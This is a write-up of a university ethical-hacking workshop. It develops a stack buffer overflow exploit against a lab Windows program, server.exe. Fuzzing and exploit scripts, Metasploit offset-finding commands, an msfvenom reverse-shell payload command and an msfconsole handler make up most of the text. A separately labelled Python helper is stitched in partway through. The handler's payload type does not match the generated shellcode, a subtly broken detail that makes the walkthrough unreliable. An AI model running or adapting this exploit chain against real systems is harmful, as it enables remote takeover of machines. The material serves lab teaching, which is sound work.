CSI3208 Ethical Hacking and Defence | Network Configuration
Task
Preparation
- Open Kali virtual machine
- Open Win32 Buffer Victim virtual machine
- Ensure both are set to NAT networking
- Check the IP addresses on both
Answer:
Exploit Development
The workshop is designed as a lesson in ethical hacking and defence using two virtual machines. Two machines are created in VMware: a Kali Linux machine used to perform the attack and a Windows client machine that acts as the victim. In the network configuration both machines are set to NAT so that they can communicate using their private and public addresses, and the IP address of each machine is checked. This completes the preparation stage.
In the stage of finding the overflow, Immunity Debugger is installed on the Windows machine; the file server.exe is loaded into Immunity Debugger and executed by pressing F9. On Kali Linux a file named attack.py is created and the following code given in the workshop is entered into it.
#!/usr/bin/python
import sys
import socket

host = sys.argv[1]
port = int(sys.argv[2])

# Testing: send 500 'A' bytes (0x41) and watch whether server.exe crashes
buffer = b"\x41" * 500

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
s.close()
On the Kali Linux virtual machine the command ‘python attack.py IP_ADDRESS 1337’ is executed, with the IP address of the victim machine entered in place of IP_ADDRESS. In the Windows environment the exception is passed to the program so that execution continues, and a screen similar to the following appears with values of the same kind. The values of EIP and EBP are overwritten with the bytes sent by the attacker, and the ESP register points to a different memory region that also contains the data injected from the attacking machine.
In the stage of weaponising the vulnerability, Immunity Debugger on the victim machine is used to restart server.exe and start its execution. On the Kali virtual machine the Metasploit tool is used to perform the exploitation on the network by running the following commands.
“cd /usr/share/metasploit-framework/tools/exploit”, followed by
“./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337”.
Here again the IP address of the victim machine is entered in order to perform the exploitation and identify the vulnerability of the machine. The exception is passed on the victim machine and the resulting value of EIP is noted. The following command is used to identify the offset at which EIP is overwritten:
“./pattern_offset.rb -l 5000 -q 37694136”
The result is noted, and the address of a JMP ESP instruction is needed in order to jump to ESP; server.exe is restarted and its execution is started. After starting execution, the executable modules are viewed and searched for JMP ESP, and the result found in GDI32 is used. The memory address is noted and the code of attack.py is modified as follows.
#!/usr/bin/python
import sys
import socket

host = sys.argv[1]
port = int(sys.argv[2])

# EIP is overwritten at 260 bytes
buffer = b"\x41" * 260
# Overwrite EIP with the address of JMP ESP found in GDI32 (0x77F31678, written little-endian)
buffer += b"\x78\x16\xF3\x77"
# NOPSLED
buffer += b"\x90" * 128
# Shellcode: placeholder, the msfvenom -f python output is pasted here (the page does not reproduce it)
shellcode = b""
buffer += shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
s.close()
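Added example, not part of the workshop: a Python re-implementation of the pattern_create / pattern_offset calculation used above, so the 260-byte offset and the little-endian byte order of the JMP ESP address can be checked without the Metasploit tools. It assumes the EIP value 37694136 read off Immunity Debugger and the GDI32 address 0x77F31678 given on the page.

```python
# Added example (not the workshop's code): recompute the EIP offset from the
# cyclic pattern, the way pattern_offset.rb does, and show why the return
# address is written as "\x78\x16\xF3\x77".
import itertools
import string
import struct


def pattern_create(length):
    """Return a cyclic pattern like Metasploit's pattern_create.rb.

    Each 3-byte group is "Upper lower digit" with the digit cycling fastest
    (Aa0Aa1 ... Aa9Ab0 ...), so every 4-byte window is unique within the
    first 20280 bytes and identifies its own position in the buffer.
    """
    triplets = ("".join(t) for t in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits))
    out = ""
    for t in triplets:
        if len(out) >= length:
            break
        out += t
    return out[:length]


def pattern_offset(length, eip_hex):
    """Return the buffer offset of the 4 bytes that landed in EIP, or -1.

    The debugger shows EIP as a big-endian number, but the bytes were copied
    onto the stack little-endian, so they are reversed before searching.
    """
    needle = struct.pack("<I", int(eip_hex, 16))
    try:
        needle = needle.decode("ascii")
    except UnicodeDecodeError:
        return -1  # not bytes from the pattern, e.g. a real code address
    return pattern_create(length).find(needle)


def eip_bytes(address):
    """Little-endian encoding of a return address, as placed in the buffer."""
    return struct.pack("<I", address)


if __name__ == "__main__":
    # Assumed values from the workshop: EIP 37694136, JMP ESP at 0x77F31678
    print("EIP offset:", pattern_offset(5000, "37694136"))  # 260
    print("EIP bytes:", eip_bytes(0x77F31678))              # b'x\x16\xf3w'
```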
A shellcode is generated on Kali Linux using the following command:
“msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.2 -e x86/shikata_ga_nai -b '\x00\xff\x0a\x0b\x0d' -i 3 -f python”
The attack.py file is modified to include the shellcode generated by the above command.
For the exploitation the following command is used:
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.2; exploit"
Immunity Debugger is closed and server.exe is opened directly on the victim machine, and on the Linux machine the following command is executed:
“python attack.py IP_ADDRESS 1337”